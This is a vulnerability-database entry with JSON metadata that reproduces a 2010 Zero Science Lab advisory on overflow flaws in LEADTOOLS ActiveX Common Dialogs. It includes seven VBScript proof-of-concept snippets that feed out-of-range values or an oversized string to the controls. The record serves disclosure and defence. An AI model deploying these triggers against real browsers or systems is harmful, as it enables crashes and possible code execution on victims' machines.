VAR-201009-0424
Vulnerability from variot - Updated: 2022-10-19 22:39LEADTOOLS Imaging Common Dialogs provides professional-grade imaging common dialogs for graphics processing, transformations, and effects. The LtocxImgEfxDlgu. ActiveX control provided by Imaging Common Dialogs does not properly filter input parameters. Users who are tricked into accessing malicious web pages and transmitting long parameters may cause arbitrary code execution. An attacker may exploit these issues to execute arbitrary code within the context of the application (typically Internet Explorer) that invoked the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. Product Web Page: http://www.leadtools.com Affected version: 16.5.0.2
Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications.
Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll
- RegKey Safe for Script: True
- RegKey Safe for Init: True
Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
24.08.2010
Zero Science Lab Advisory ID: ZSL-2010-4961
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php
Proof of Concept:
1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U" argCount = 1 arg1=-1 target.Bitmap = arg12. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U" argCount = 1 arg1=-1 target.Bitmap = arg13. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U" argCount = 1 arg1=2147483647 target.Bitmap = arg14. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U" argCount = 1 arg1=-2147483647 target.Bitmap = arg15. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U" argCount = 1 arg1=2147483647 target.Bitmap = arg16. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):
targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll" prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long" memberName = "UserPalette" progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U" argCount = 2 arg1=1 arg2=-2147483647 target.UserPalette(arg1 ) = arg27. (File, LtocxFileDlgu.dll / LTRDFU.DLL):
targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll" prototype = "Property Let DestinationPath As String" memberName = "DestinationPath" progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U" argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201009-0424",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imaging common dialogs",
"scope": "eq",
"trust": 3.6,
"vendor": "leadtools",
"version": "16.5.0.2"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "no",
"version": null
},
{
"model": "imaging activex",
"scope": "eq",
"trust": 0.3,
"vendor": "leadtools",
"version": "16.5"
},
{
"model": "leadtools activex common dialogs",
"scope": "eq",
"trust": 0.1,
"vendor": "lead",
"version": "16.5.0.2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"db": "BID",
"id": "42911"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "42911"
},
{
"db": "PACKETSTORM",
"id": "93403"
}
],
"trust": 0.4
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [],
"severity": [
{
"author": "ZSL",
"id": "ZSL-2010-4961",
"trust": 0.1,
"value": "(4/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LEADTOOLS Imaging Common Dialogs provides professional-grade imaging common dialogs for graphics processing, transformations, and effects. The LtocxImgEfxDlgu. ActiveX control provided by Imaging Common Dialogs does not properly filter input parameters. Users who are tricked into accessing malicious web pages and transmitting long parameters may cause arbitrary code execution. \nAn attacker may exploit these issues to execute arbitrary code within the context of the application (typically Internet Explorer) that invoked the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. \nProduct Web Page: http://www.leadtools.com\nAffected version: 16.5.0.2\n\n\nSummary: With LEADTOOLS you can control any scanner, digital camera\nor capture card that has a TWAIN (32 and 64 bit) device driver. \nHigh-level acquisition support is included for ease of use while\nlow-level functionality is provided for flexibility and control in\neven the most demanding scanning applications. \n\n\nDesc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote\nvulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in\ndifferent objects included in the Common Dialogs class. ActiveX Common Dialogs (File) -------------------\u003e LtocxFileDlgu.dll\n\n\n- RegKey Safe for Script: True\n- RegKey Safe for Init: True\n\n\nTested On: Microsoft Windows XP Professional SP3 (EN)\n Windows Internet Explorer 8.0.6001.18702\n RFgen Mobile Development Studio 4.0.0.06 (Enterprise)\n\n\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\nliquidworm gmail com\n\nZero Science Lab - http://www.zeroscience.mk\n\n24.08.2010\n\n\n\nZero Science Lab Advisory ID: ZSL-2010-4961\n\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php\n\n\n\n\n##############################################################\n\t\t\tProof of Concept:\n##############################################################\n\n\n\n\n1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxWebDlgu.dll\"\n prototype = \"Property Let Bitmap As Long\"\n memberName = \"Bitmap\"\n progid = \"LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U\"\n argCount = 1\n arg1=-1\n target.Bitmap = arg1\n \u003c/script\u003e\n\n\n2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxEfxDlgu.dll\"\n prototype = \"Property Let Bitmap As Long\"\n memberName = \"Bitmap\"\n progid = \"LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U\"\n argCount = 1\n arg1=-1\n target.Bitmap = arg1\n \u003c/script\u003e\n\n\n3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxImgDlgu.dll\"\n prototype = \"Property Let Bitmap As Long\"\n memberName = \"Bitmap\"\n progid = \"LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U\"\n argCount = 1\n arg1=2147483647\n target.Bitmap = arg1\n \u003c/script\u003e\n\n\n4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxImgEfxDlgu.dll\"\n prototype = \"Property Let Bitmap As Long\"\n memberName = \"Bitmap\"\n progid = \"LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U\"\n argCount = 1\n arg1=-2147483647\n target.Bitmap = arg1\n \u003c/script\u003e\n\n\n5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxImgDocDlgu.dll\"\n prototype = \"Property Let Bitmap As Long\"\n memberName = \"Bitmap\"\n progid = \"LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U\"\n argCount = 1\n arg1=2147483647\n target.Bitmap = arg1\n \u003c/script\u003e\n\n\n6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\LEAD Technologies\\LEADTOOLS Active-X 16.5\\Bin\\CDLL\\Win32\\LtocxClrDlgu.dll\"\n prototype = \"Property Let UserPalette ( ByVal iIndex As Integer ) As Long\"\n memberName = \"UserPalette\"\n progid = \"LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U\"\n argCount = 2\n arg1=1\n arg2=-2147483647\n target.UserPalette(arg1 ) = arg2\n \u003c/script\u003e\n\n\n7. (File, LtocxFileDlgu.dll / LTRDFU.DLL):\n------------------------------------------------------\n\n \u003cobject classid=\u0027clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F\u0027 id=\u0027target\u0027 /\u003e\n \u003cscript language=\u0027vbscript\u0027\u003e\n targetFile = \"C:\\Program Files\\RFGen40\\LtocxFileDlgu.dll\"\n prototype = \"Property Let DestinationPath As String\"\n memberName = \"DestinationPath\"\n progid = \"LTRASTERDLGFILELib_U.LEADRasterDlgFile_U\"\n argCount = 1\n arg1=String(9236, \"A\")\n target.DestinationPath = arg1\n \u003c/script\u003e\n\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"db": "BID",
"id": "42911"
},
{
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"db": "PACKETSTORM",
"id": "93403"
}
],
"trust": 4.23
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/lead_activex.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "EXPLOIT-DB",
"id": "14852",
"trust": 4.3
},
{
"db": "CNVD",
"id": "CNVD-2010-1839",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1838",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1840",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1837",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1841",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1842",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2010-1836",
"trust": 0.6
},
{
"db": "BID",
"id": "42911",
"trust": 0.4
},
{
"db": "ZSL",
"id": "ZSL-2010-4961",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "93403",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"db": "BID",
"id": "42911"
},
{
"db": "PACKETSTORM",
"id": "93403"
}
]
},
"id": "VAR-201009-0424",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
}
],
"trust": 5.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 4.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
}
]
},
"last_update_date": "2022-10-19T22:39:18.968000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.3,
"url": "http://www.exploit-db.com/exploits/14852/"
},
{
"trust": 0.3,
"url": "http://leadtools.com/downloads/default.htm"
},
{
"trust": 0.3,
"url": "http://www.leadtools.com/sdk/common-dialog/default.htm"
},
{
"trust": 0.3,
"url": "http://support.microsoft.com/kb/240797"
},
{
"trust": 0.1,
"url": "http://www.packetstormsecurity.org/filedesc/zsl-2010-4961.txt.html"
},
{
"trust": 0.1,
"url": "http://www.vfocus.net/art/20100902/7791.html"
},
{
"trust": 0.1,
"url": "http://www.venustech.com.cn/newsinfo/124/8057.html"
},
{
"trust": 0.1,
"url": "http://net-security.org/vuln.php?id=14060"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/42911"
},
{
"trust": 0.1,
"url": "http://www.leadtools.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2010-4961.php"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"db": "BID",
"id": "42911"
},
{
"db": "PACKETSTORM",
"id": "93403"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"db": "BID",
"id": "42911"
},
{
"db": "PACKETSTORM",
"id": "93403"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-09-01T00:00:00",
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"date": "2010-09-01T00:00:00",
"db": "BID",
"id": "42911"
},
{
"date": "2010-09-01T20:24:41",
"db": "PACKETSTORM",
"id": "93403"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-10-26T00:00:00",
"db": "ZSL",
"id": "ZSL-2010-4961"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1839"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1838"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1840"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1837"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1841"
},
{
"date": "2010-09-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1842"
},
{
"date": "2010-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1836"
},
{
"date": "2010-09-01T00:00:00",
"db": "BID",
"id": "42911"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "42911"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LEADCOXImgEfxDlgu.dll Control Remote Code Execution Vulnerability in LEADTOOLS Imaging Common Dialogs",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1839"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "42911"
}
],
"trust": 0.3
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…